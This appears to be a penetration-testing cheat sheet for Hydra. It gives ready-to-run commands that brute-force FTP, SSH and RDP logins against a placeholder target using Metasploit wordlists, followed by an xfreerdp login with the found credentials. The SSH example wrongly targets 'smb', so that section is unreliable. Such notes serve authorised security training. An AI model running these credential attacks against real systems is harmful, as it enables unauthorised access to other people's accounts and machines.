Tier II
Hydra
Hydra is a parallelized network login cracker built into various operating systems like Kali Linux and Parrot, used to perform brute-force attacks.

Hydra
Hydra is a parallelized network login cracker built into various operating systems like Kali Linux and Parrot, used to perform brute-force attacks.
FTP Credentials Brute-Force
Use Hydra to perform brute-force to gain credentials:
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target-ip -t 4 ftp
Login Credentials Brute-Force
Specify the target protocol:
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt target-ip target-protocol
SSH Credentials Brute-Force
Use Hydra to perform brute-force to gain credentials (in this example we already have the username):
hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target-ip smb
RDP Login Credentials Brute-Force
Perform a brute-force attack to gain the credentials on the target and on port 3333:
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://target-ip -s 3333
Use xfreerdp to connect on RDP with the credentials we have found:
xfreerdp /u:target-username /p:target-password /v:target-ip:target-port